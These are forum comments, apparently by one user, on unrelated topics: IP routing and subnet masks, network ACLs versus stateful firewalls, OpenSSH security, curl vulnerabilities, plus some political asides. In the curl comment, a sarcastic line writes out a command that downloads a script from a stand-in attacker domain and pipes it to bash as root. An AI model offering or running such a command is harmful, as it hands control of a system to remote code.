Seems novel. But from a security aspect, if OpenSSH has security vulnerability that allows an unauthenticated user to login, via whatever means, once you are in the system as a non-privileged user, you are now free to use the same vulnerability to get root.

Basically this exercise is like using two locks that have the same key to open them. If the same key opens them, then a weakness in one, is now a weakness in the other so why bother with two identical locks?

Egg superiority.

hahaah. Ok sure you win. Linux TTY’s are absolutely not terminals. Sure they are called terminals, they are for all intents and purposes modern-day terminals with a long and storied history that directly links them to terminals from the 70’s but since they aren’t a physical piece of hardware that electro-mechanically connects to a mainframe, obviously they aren’t really terminals and they should be be called something else.

Do you know what a terminal is?

The people worried about “losing an election” are paid by the people who profit from the broken system. The communism fear is a strawman that liberals use to excuse their worthless party.

What’s the big streak at 1000-1031, 1100-31 and 1200-1231?

It could be brith date, but why only 10-12 specifically? I thought birth months were more normal distributed.

When my calculator app in windows is suspended, but has locked 29 threads and is using 60megs of ram. Not that those two values are significant, but why is my caluclator-app “suspended” when I closed it a few days ago since the last time I used it? Shouldn’t it just be closed and not showing up at all.

I’m not a software developer, but I absolutely do coding and one of the standard questions I ask is what OS they run on official company approved laptops. Other then a removedty bank I worked at for a few years (bad idea, but at least I got a pension out of it), all of them allow windows, osx, and at least one flavor of linux. If they don’t allow that stuff, you should just turn down the offer anyway.

Layer3 decides where broadcasts stop (at the boundary between two networks, i.e. a router)

Layer2 is where broadcasts go.

This isn’t actually correct. An ip address assignment for a host with an IP requires both the address and the subnet mask. One cannot be assigned without the other. Even more strictly speaking the address by itself isn’t useful to the network stack except as a destination, and isn’t used anywhere in the network stack of the host. There is always a subnet mask, sometimes the mask is assumed to be /32 (255.255.255.255), sometimes /24, whatever. But whenever you are talking about assigning an ip address to any IP speaker, it must include the mask.

The routing table on every IP speaker will include at a minimum a single host-route. That is the IP of the system itself with a /32 mask and the configured interface of that IP. Whether it’s eth0, a bonded interface, a loopback etc.

Once you have that single host route, additional routes can be added as needed. These routes require an address, a subnet, and a next-hop. The next hop can be a directly attached interface, or an IP that the is reachable by another route in the host routing table.

If you have only a host route, as OP has, then the system has no network knowledge, so there are no reachable next hop IPs. So you would have to use a directly connected interface, like the OP did. Once you tell the system 192.168.0.0/24 is reachable through that interface, then any IP Packets that have that network as their destination will use that interface with a source of the one IP it has. In the case of two servers connected back to back, assuming the other server knows where the source of the packet came from, there is no problem sending traffic back.

So to answer the OPs question, there is no difference between one host route, then a static route pointing to an interface, and just a directly connected interface with your server IP on it. They are two different routes that may have different administrative distances, but assuming you aren’t doing anything exotic, for all intents and purposes they are the same.

If you are talking about layer2 concepts like broadcasts, the host-route configured server can still receive broadcasts, but only broadcasts with destination ip of 255.255.255.255, not scoped broadcasts like 192.168.0.255 since it will ignore all traffic that isn’t unscoped broadcast or a full match to it’s own IP address.

Dotted Decimal is just a human convention. IPs are just 32 bit numbers meaning binary digit, and octal, dotted decimal and Hex are all valid representations of that same number. Subnet masks work via binary math.

Almost every single thing you would use an IP address for, you can substitute dotted decimal for octal or hex representations.

Yes, as long as you never connect your TV to the internet, then it is for all intents and purposes a “dumb tv.”

Right but if you want to start doing application level blocking, then the proper tool for the job is a stateful firewall and even better, a RADIUS/Kerberos system that authenticates every connection between servers.

Basically I use ACLs to prevent spoofing attacks from originating out of my network, and also to lock down the management plane of my network devices to specific subnets. In all other cases a stateful firewall should be used exclusively.

In any other case ACLs provide the illusion of security and create a huge amount of operational friction especially in a dynamic environment.

Only if you assume IP Addresses act as authentication for what that host is. But since they don’t, I see ACLs as a security blanket.
I can change the IP of a server I control and bypass any ACL easily. If I have control of my network as well, then no ACL you apply can stop any of my servers from hitting whatever server you have allowed any of my servers to hit. So why not just allow my entire network block?

Network ACLs are my bane. Someone long ago decided we needed to “isolate” the network, so they put ACLs everywhere and so now 50% of my teams time is spend removeding with ACLs :/ It’s awful.

The only thing you need to know about file acls is not to use them. Similar thing can be said for Network ACLs to be honest.

I’ll admit i’m out of my depth about exactly how curl works on the local system, but surely if there is a vulnerability in the “libcurl” library that is much more serious and severe then just saying “curl” is vulnerable.

I’m assuming that libcurl touches a huge amount of the linux network stack.

I don’t see how a vulnerability in Curl can exist at all unless it’s privilege escalation (you don’t run curl as root do you?) And if it’s not a privilege escalation, then it sounds like it’s just a “root user can do things that you can do as root, possibly unintended” which isn’t a vulnerability at all.

sudo curl www.badactor.ru/hackme | bash !!!

Edit: at this point I’m beginning to think that people arguing for consumer responsibility as equally or even more important than legal regulation on emitters are at best useful idiots propping up polluting industries

Those people are the target and purpose of this type of industry propaganda.

If fast fashion wasn’t an option would you be naked? No, your country would have it’s own cottage industry of clothing much like used to exist before fast fashion flooded your markets. You get rid of fast fashion and now you have local quality back.